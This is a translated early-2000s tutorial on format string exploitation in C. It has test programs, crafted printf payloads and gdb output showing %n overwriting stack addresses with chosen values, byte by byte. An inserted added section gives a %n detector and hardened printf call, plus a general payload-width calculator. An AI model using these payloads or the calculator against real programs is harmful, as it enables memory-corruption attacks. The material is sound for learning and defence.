=======================================================================================
Title: format string 원리 이해 (Understanding the format string principle)
Author: 유동훈 (Xpl017Elz) in INetCop
E-mail: szoahc@hotmail.com
Home: http://x82.i21c.net
Date: f.2001/12/07 s.2002/03/22
=======================================================================================

P.S: Rather than simply writing an exploit that uses the format string technique, I think it is more important to grasp the concept firmly and understand the principle behind it. I tried approaching it from a different angle than the documents I had written before. Note that the content of this document has never been properly polished, so it is messy and may be quite uncomfortable to read. --;

To overwrite an arbitrary value at a desired address, I tested as follows. Because of the nature of the "%n" directive, it overwrites a value at the address it is given.

src:
--
#include <stdio.h>

int main(void)
{
    char x0x[0x82] = "\x30\xfc\xff\xbf%00100n";
    printf(x0x);
}
--

I first supplied the address, 0xbffffc30. (Note that the address is written in little-endian byte order.) To go with it, I put in the format string ("%00100n").

bash$ gcc -otest test.c && gdb -q test
(gdb) br *main+66
Breakpoint 1 at 0x804843a
(gdb) r
Starting program: /tmp/test

Breakpoint 1, 0x804843a in main ()
(gdb) x 0xbffffc30
0xbffffc30:     0x00000004
(gdb) q
The program is running.  Exit anyway? (y or n) y
bash$

Looking at the address 0xbffffc30 that I was trying to overwrite, the value 4 was written there. (The reason is that "\x30\xfc\xff\xbf", 4 bytes, was placed in front of the format string.) "%n" stored the number of characters written so far at the address it was given (0xbffffc30). Even though I specified a width of 100 bytes in front of it, that made no difference at all and only 4 was stored. ^^ (No relation whatsoever.)

So this time I will put a value in front, have it written to the stack, and then store the count with "%n". The src has to be changed as follows, because the format string has grown. To line the address 0xbffffc30 up with the "%n" directive, an offset and format strings have to be placed in front of it. In my case I filled the offset with AAAA and inserted two "%x" so that the "%n" directive would store its value at address 0xbffffc30.
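The defect behind every experiment in this document is the call printf(x0x), where the buffer itself is the format. As an added example that is not part of the original document (function names are ours), here is a small C scanner that walks a string the way printf parses it and reports whether it carries a "%n" write directive, beside the corrected call that passes the data as a %s argument.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Walk fmt the way printf does (flags, width, precision, length modifier,
 * conversion) and return 1 if any conversion is a "%n" write directive.
 * Function and variable names are ours, not the document's. */
int has_n_directive(const char *fmt)
{
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                                   /* "%%" literal */
            continue;
        while (*p && strchr("-+ #0", *p))                /* flags */
            p++;
        while (*p == '*' || isdigit((unsigned char)*p))  /* width */
            p++;
        if (*p == '.') {                                 /* precision */
            p++;
            while (*p == '*' || isdigit((unsigned char)*p))
                p++;
        }
        while (*p && strchr("hlLqjzt", *p))              /* length modifier */
            p++;
        if (*p == 'n')
            return 1;
        if (!*p)                                         /* trailing '%' */
            break;
    }
    return 0;
}

/* The document's pattern, printf(x0x), hands attacker data to printf as the
 * format. The hardened form passes it as a %s argument: every '%' in the
 * buffer is then printed literally and no directive is interpreted. */
void print_untrusted(const char *buf)
{
    printf("%s", buf);
}

int main(void)
{
    /* constructed sample: the document's second test string */
    const char *x0x = "AAAA\x90\xfc\xff\xbf%x%x%00100x%n";
    printf("has %%n directive: %d\n", has_n_directive(x0x));  /* 1 */
    print_untrusted(x0x);   /* the bytes are echoed, nothing is written */
    putchar('\n');
    return 0;
}
```

GCC's -Wformat-security flags the printf(x0x) form at compile time, which is the cheaper check whenever the source is available.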
However, a problem can arise when lining up the address value stored on the stack with the one being printed (0xbffffc30<->%n). It happens when a stack value printed by the format string ("%x") does not come out as a full 8 digits (that is, when it is not aligned to 4 bytes). To handle this, the attacker gives a width in front of the format string so that the output is aligned to 4 bytes. ^^ It can be written like this: "%8x" (0x0 is printed padded out to 0x00000000, which is also convenient for counting in units of 4). If every stack value being printed is already stored cleanly in 4-byte alignment, you don't need to worry about this problem. But since part of the stack usually contains 0x0 as well, it is convenient to use "%8x" when computing the count.

So, I modified it.

src:
--
#include <stdio.h>

int main(void)
{
    char x0x[0x82] = "AAAA\x90\xfc\xff\xbf%x%x%00100x%n";
    printf(x0x);
}
--

"%x%x" went in.. In my case, when debugging, fully 4-byte-aligned 16-digit values were printed clearly, so I put it in this way. In your case, to be safe, use "%8x" and compute from that. The debugging result is as follows.

Breakpoint 1, 0x8048440 in main ()
(gdb) x 0xbffffc90
0xbffffc90:     0x0000007c
(gdb)

0x7c is 124 bytes. First, 100 bytes were used via "%00100x". In front, "AAAA\x90\xfc\xff\xbf" is 8 bytes and "%x%x" is 16 bytes. Adding it all up ... 100 + 8 + 16 = 124 bytes. Yes, 124 bytes in total is right. ^^

Then, just for fun, shall we put the value 0x4141 into 0xbffffc30? 0x4141 is 16705 in decimal.

"AAAA\x30\xfc\xff\xbf" : 8 bytes
%x%x : 16 bytes

24 bytes in total. So in the end, we need to put 16681 bytes through the format string onto the stack. Now, let's put it in.

src:
--
#include <stdio.h>

int main(void)
{
    char x0x[0x82] = "AAAA\x30\xfc\xff\xbf%x%x%16681x%n";
    printf(x0x);
}
--

bash$ gcc -o test test.c && gdb -q test
(gdb) br *main+72
Breakpoint 1 at 0x8048440
(gdb) r
Starting program: /tmp/test
AAAA0üÿ¿4000a610bffffb04 ... (omitted) ...

Breakpoint 1, 0x8048440 in main ()
(gdb) x 0xbffffc30
0xbffffc30:     0x00004141
(gdb)

Good. ^^ We have studied how an attacker overwrites a value at the desired address. However, getting to an actual exploit takes a bit more work. Even if you store as many bytes as the user printed into the return address, as above..
..to change it to the address where the shellcode is, that is, the address the attacker wants, you cannot overwrite all of it at once. That is because the value of the format string would be far too large.. (Converting 0xbffffc30 to decimal gives 3221334496.) Hmm... not good. :-(

But there is another good way. ^^ Namely, using several format strings and inserting the address in pieces. You split up the address you want to insert (above we tested 0x7c and 0x4141) and compute it in parts. If 0x4141 was computed as 16705 and inserted in one go.. then 0x41414141 can be split into 2-byte pieces and inserted over two writes. The method is simple. First, as before, write the argument the format string is to reference in front, so that it points at that address ("AAAA\x30\xfc\xff\xbf"). Right after that, put in the next address to overwrite ("ZZZZ\x32\xfc\xff\xbf"). After overwriting 2 bytes at address 0xbffffc30, overwrite the remaining 2 bytes at address 0xbffffc32. Let's do a simple test again.

src:
--
#include <stdio.h>

int main(void)
{
    char x0x[0x82] = "AAAA\x30\xfc\xff\xbfZZZZ\x32\xfc\xff\xbf%x%x%00010x%n%00010x%n";
    printf(x0x);
}
--

Likewise, "%x%x" is the 16-byte offset that lines up the address value with the "%n" directive. The address values it references, "AAAA\x30\xfc\xff\xbfZZZZ\x32\xfc\xff\xbf", are also 16 bytes. So 32 bytes have already been written.. Adding the first format string "%00010x" to that makes 42 bytes in total, and that count is written by the "%n" directive. Next, adding the second format string "%00010x" makes 52 bytes, and this value is again written by the "%n" directive. So in the end, the value 42 should be stored at 0xbffffc30 and the value 52 at 0xbffffc32. Shall we check?

(gdb) br *main+73
Breakpoint 1 at 0x8048441
(gdb) r
Starting program: /tmp/test

Breakpoint 1, 0x8048441 in main ()
(gdb) x 0xbffffc30
0xbffffc30:     0x0034002a
(gdb)

You can see that 0x2a is stored at 0xbffffc30 and 0x34 at 0xbffffc32. Converting to decimal, 0x2a is 42 and 0x34 is 52, as expected. :-)

Now we have covered the whole principle. Let's actually overwrite 0xbffffc30 with an arbitrary attacker-chosen value, 0x41414141.
src:
--
#include <stdio.h>

int main(void)
{
    char x0x[0x82] =
        "\x41\x41\x41\x41\x30\xfc\xff\xbf"
        "\x41\x41\x41\x41\x32\xfc\xff\xbf"
        "%x%x%16673x%n%65536x%n";
    printf(x0x);
}
--

16673 is 0x4141 with the 32 already written taken off. Then the value to write next is what remains of the address after subtracting everything already written, right? So the formula is as follows.

(0x4141 - 0x4141) - 32

But here a problem appears. If you subtract 0x4141, what's left is 0. This can be solved as follows. First, since 0x41414141 only needs to go into address 0xbffffc30, it does not matter if some other value is written to 0xbffffc34. So let's overwrite 0x0141414141 instead of 0x41414141. That writes one extra byte, 0x01, at 0xbffffc34. As a result, 0xbffffc30 ~ 0xbffffc33 can be overwritten perfectly with 0x41414141. :-) So I subtracted 0x4141 from 0x014141. That leaves 0x010000, right? That is 65536 in decimal. Now let's overwrite with the computed values.

(gdb) x/2 0xbffffc30
0xbffffc30:     0x41414141      0x69640001
(gdb)

w0w~! After the attack, you can see it was overwritten nicely. Of course, one byte of 0x01 was stored at 0xbffffc34 as well. Real address values are computed the same way when exploiting.

Then this time, instead of the two-overwrite method, let's overwrite using four writes.

src:
--
#include <stdio.h>

int main(void)
{
    // overwrite address 0xbffffc30 with the value 0xbffffc30
    char x0x[100] =
        "\x41\x41\x41\x41\x30\xfc\xff\xbf"
        "\x41\x41\x41\x41\x31\xfc\xff\xbf"
        "\x41\x41\x41\x41\x32\xfc\xff\xbf"
        "\x41\x41\x41\x41\x33\xfc\xff\xbf"
        "%x%x%256x%n%204x%n%259x%n%192x%n";
    printf(x0x);
}
--

It looks a bit complicated.. but it isn't at all. ^^ First, since we overwrite in four passes, think of it as writing 1 byte at a time. Take off the address values and offset in front (32 bytes written), then the "%x%x" format string (48 bytes written). We have to subtract the 48 bytes written so far, but since the last byte is 0x30, subtracting leaves 0. :-( In that case, subtract 48 bytes from 0x130 instead. That way 0x30 is written at 0xbffffc30, and then 0x01 at 0xbffffc31. (304 bytes written) Next, to subtract 0x130 from 0xfc, you have to make it 0x1fc and compute. The result is 204 in decimal. (508 bytes written) Next, 0x1fc has to be subtracted from 0xff.
This too is computed by making it 0x1ff. But computing it that way leaves only 3. Since the remainder is too small, you have to add another 0x0100 and compute. So, subtracting 0x1fc from 0x2ff leaves 259. (767 bytes written) Finally, subtracting 0x2ff from 0x3bf gives 192. Putting it all together, you can see that a total of 959 bytes of data are used.

"\x41\x41\x41\x41\x30\xfc\xff\xbf" = 8
"\x41\x41\x41\x41\x31\xfc\xff\xbf" = 8
"\x41\x41\x41\x41\x32\xfc\xff\xbf" = 8
"\x41\x41\x41\x41\x33\xfc\xff\xbf" = 8
"%x%x" = 16
0xbffffc30: 0x0130 - 0x0030 = 256
0xbffffc31: 0x01fc - 0x0130 = 204
0xbffffc32: 0x02ff - 0x01fc = 259
0xbffffc33: 0x03bf - 0x02ff = 192
--------------------------------------------
total: = 959byte

The following is the debugging result after running it.

(gdb) x/2 0xbffffc30
0xbffffc30:     0xbffffc30      0x6b000003
(gdb)

bingo!! :-D In the end the value 0x03bffffc30 was written.

The following sample is concept code that overwrites address 0xbffffc30 with 0x41414141 and address 0xbffffc34 with 0xbffffc30.

--
#include <stdio.h>

int main(void)
{
    char x0x[0x82] =
        "\x41\x41\x41\x41\x30\xfc\xff\xbf"
        "\x41\x41\x41\x41\x32\xfc\xff\xbf"
        "\x41\x41\x41\x41\x34\xfc\xff\xbf"
        "\x41\x41\x41\x41\x36\xfc\xff\xbf"
        "%x%x%16657x%n%65536x%n%47855x%n%50127x%n";
    printf(x0x);
}

/*
"\x41\x41\x41\x41\x30\xfc\xff\xbf" = 8
"\x41\x41\x41\x41\x32\xfc\xff\xbf" = 8
"\x41\x41\x41\x41\x34\xfc\xff\xbf" = 8
"\x41\x41\x41\x41\x36\xfc\xff\xbf" = 8
"%x%x" = 16
0xbffffc30: 0x004141 - 0x000030 = 16657
0xbffffc32: 0x014141 - 0x004141 = 65536
0xbffffc34: 0x01fc30 - 0x014141 = 47855
0xbffffc36: 0x02bfff - 0x01fc30 = 50127
------------------------------------------------
total: = 180223byte

(gdb) x/3 0xbffffc30
0xbffffc30:     0x41414141      0xbffffc30      0x67690002
(gdb)

overwrite: 0x0002bffffc3041414141
*/
--
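The one-byte table, the two-byte concept code and the earlier two-write split of 0x41414141 all follow one rule: each width is the target chunk minus the running character count, taken modulo the chunk size, bumped by one modulus when the difference is too small to be printed exactly. As an added example that is not code from the original document, the following C function carries that arithmetic through in general and reproduces every number in the author's tables; the minimum-width threshold of 8 is our assumption (a %x of a 32-bit value may print up to 8 digits, so a narrower field cannot fix the count), and the names are ours.

```c
#include <stdio.h>
#include <stdint.h>
/* A "%<w>x" of a 32-bit value prints up to 8 digits, so a narrower field
 * cannot pin the count: the author's "remainder too small, add 0x0100"
 * case. The threshold is our assumption, not the document's. */
#define MIN_WIDTH 8

/* value: bytes to plant, little-endian from the first target address
 * (0x41414141, or 0xbffffc3041414141 for the two-word concept code);
 * chunk_bytes: bytes each %n sets (1, 2 or 4); written: characters printed
 * before the first width field. Fills widths[] (may be NULL) and returns
 * the running count when the last %n fires. Names are ours. */
unsigned long split_widths(uint64_t value, int chunk_bytes, int nchunks,
                           unsigned long written, unsigned long *widths)
{
    uint64_t modulus = (uint64_t)1 << (8 * chunk_bytes);
    uint64_t mask = modulus - 1;
    unsigned long total = written;
    for (int i = 0; i < nchunks; i++) {
        uint64_t target = (value >> (8 * chunk_bytes * i)) & mask;
        /* only the low chunk_bytes of the count land in the chunk */
        uint64_t width = (target - (total & mask)) & mask;
        if (width < MIN_WIDTH)
            width += modulus;
        if (widths)
            widths[i] = (unsigned long)width;
        total += (unsigned long)width;
    }
    return total;
}

unsigned long nth_width(uint64_t value, int chunk_bytes, int nchunks,
                        unsigned long written, int i)
{
    unsigned long w[8];
    if (nchunks > 8 || i < 0 || i >= nchunks)
        return 0;
    split_widths(value, chunk_bytes, nchunks, written, w);
    return w[i];
}

int main(void)
{
    /* the document's four-write table: 0xbffffc30, 1-byte chunks, 48 written */
    unsigned long w[4], total = split_widths(0xbffffc30ULL, 1, 4, 48, w);
    for (int i = 0; i < 4; i++)
        printf("0xbffffc3%d: %%%lux%%n\n", i, w[i]);
    printf("total: %lu bytes\n", total);   /* 959, as in the document */
    return 0;
}
```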